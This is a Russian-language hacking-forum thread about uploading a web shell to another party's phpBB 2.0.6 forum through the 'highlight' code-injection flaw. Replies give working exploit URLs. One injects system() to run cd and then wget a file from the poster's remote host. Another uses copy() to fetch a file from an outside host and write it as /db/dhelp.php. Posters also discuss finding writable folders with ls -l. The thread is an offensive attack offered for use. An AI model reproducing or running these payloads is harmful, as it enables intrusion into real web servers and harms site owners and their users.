|
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6
какая команда на запись в другую папку.(отличную от корневой напр. "forum)"
расcказываю как есть... на одном форуме есть папка доступная к записыванию эта папка называется db ВОПРОС: как залить туда шелл, использую эту уязвимость Цитата:
форум phpBB 2.0.6 Уважаемые, только не молчите. |
Для начала зделай cd <путь>, а вот потом уж заливай!
Что-то типа: viewtopic.php?xxx=cd <путь>;wget <адрес твоего ремоута>&t=1&highlight=%2527.system($_GET[xxx]).include%2527 |
нет, illusion
что-то не подходит, мне кажется ты не втом порядке записал. |
хм...так что же это получается, если сам форум не разрешен на запись, значит и не в какую другую папку и не записпть, если она доступна для записи ?
|
Цитата:
|
admin drwxr-xr-x
cache drwxr-xr-x db drwxrwxrwx docs drwxr-xr-x images drwxr-xr-x includes drwxr-xr-x language drwxr-xr-x templates drwxr-xr-x common.php -rw-r--r-- config.php -rwxrwxrwx пишу, viewtopic.php?a=http://www.hot.ee/vega2k/1.hp&b=&b=/db/dhelp.php&t=44&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 и ни чего не выходит, не записывается. а вот на другом форуме, где есть доступ на запись в саму папку форума, я могу и вдругие папки записывать, которые находяться не в папке форума а чуть выше (по дереву) |
А какой командой можно посмтатреть какие папки открыты на запись???
|
vega2k так может та команда что ты пишешь не работает просто на сервере?
|
2onyx3 Вот этой ls -l
|
Егорыч+++, хех, возможно...
|
| Время: 14:42 |